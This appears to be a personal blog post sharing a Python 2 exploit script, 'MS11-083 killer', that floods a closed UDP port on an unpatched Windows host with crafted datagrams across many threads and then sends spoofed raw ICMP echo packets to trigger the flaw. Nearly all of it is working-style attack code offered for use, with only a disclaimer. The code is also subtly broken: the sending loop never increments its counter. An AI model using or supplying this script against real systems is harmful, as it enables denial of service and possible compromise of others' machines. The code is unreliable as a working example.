______ Y ______

My own personal time capsule.

MS11-083 killer

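The following code attempts to exploit MS11-083 by sending specially crafted packets to a closed UDP port (read more here). MS11-083 is the Microsoft security bulletin covering this Windows TCP/IP flaw; hosts with the corresponding update installed are not affected, so patch status is the first thing to verify.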

import socket
import threading

# Python 2 script (print statements, `except Exception,e` syntax further down).
# dpkt is a third-party packet library; IP and ICMP are used by customPing below.
try:
    from dpkt.ip import IP                            
    from dpkt.icmp import ICMP
except:
    # NOTE(review): the bare except catches every error, prints a hint and lets
    # the script carry on with IP/ICMP undefined.
    print "install dpkt if you want this program to run!"


print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"

############ EDIT THIS #################
# Destination host; the value shipped here is an RFC 1918 private address.
UDP_IP="192.168.93.15"
# Destination UDP port; the accompanying text describes it as a closed port.
UDP_PORT=839
# 15-byte datagram payload: nine 0x44 bytes followed by six 0x00 bytes.
MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
# Number of sender threads started at the bottom of the script.
ThreadCount = 32
########################################

# Echo the configured destination and payload size before any traffic is sent.
print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload lenght:", len(MESSAGE)

def customPing(UDP_IP,repeat):
    """Build one ICMP echo request with dpkt and send it ten times on a raw socket.

    UDP_IP -- destination address, used for the IP header and for connect().
    repeat -- accepted but never read; the send count is fixed at 10 below.

    Returns nothing. For detection purposes every field is a constant:
    source bytes 01 02 03 04, ICMP type 8, echo id 123, seq 1 and a
    six-byte 0xCC payload.
    """
    # craft custom ping
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    # p=1 marks the IP payload as ICMP; the source address is a fixed four-byte value.
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)
    # type=8 is an ICMP echo request carrying the 0xCC marker bytes.
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))
    ip.data = icmp
    # Grow the header's length field by the size of the attached ICMP message.
    ip.len += len(ip.data)
    print "[+] Building socket for final ping"
    # Raw sockets normally require elevated privileges on the sending host.
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # sending packet
    print "[+] Sending final ping ( debug trap ) "
    # The same serialized packet is sent 10 times; `repeat` is not consulted.
    for x in range(10):
        s.send(str(ip))

# Main section: open one shared non-blocking UDP socket and start ThreadCount
# threads that each send MESSAGE to (UDP_IP, UDP_PORT) in a tight loop.
# For defenders: the traffic is a sustained stream of identical 15-byte UDP
# datagrams from one source to a single destination port, which makes it easy
# to rate-limit or alert on. The underlying flaw is addressed by the MS11-083
# update.
try:
  print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT 
  # One datagram socket is shared by every thread.
  s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  s.setblocking(0) # set non-blocking mode
  class ThreadClass(threading.Thread):
      """Sender thread: loops over sendto(), then calls customPing once."""
      def run(self):
          c = 0
          # Per-thread loop bound is 2^32 / ThreadCount; per the author's comment the
          # stated intent is 2^32 datagrams in total to wrap a 32-bit counter.
          while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter

              s.sendto( MESSAGE, (UDP_IP,UDP_PORT ))
          # Author's note: the ICMP echo requests are meant as the follow-up step; the
          # remark about command execution is the author's speculation, not something
          # this code demonstrates.
          print "[+] Triggering actual attack "
          customPing(UDP_IP,20)
         
  # Start the sender threads and report each thread's name.
  for i in range(ThreadCount):
      t = ThreadClass()
      t.start()
      print "[+] Thread ",i," is starting and its name is : " , t.getName()
      
# This handler covers only socket creation and thread start-up in the main
# thread, not errors raised inside run().
except Exception,e:
   print " [-] Exception occured, reason : " , e

Note that this code is for educational purposes only, and I take no responsibility for any misuse.
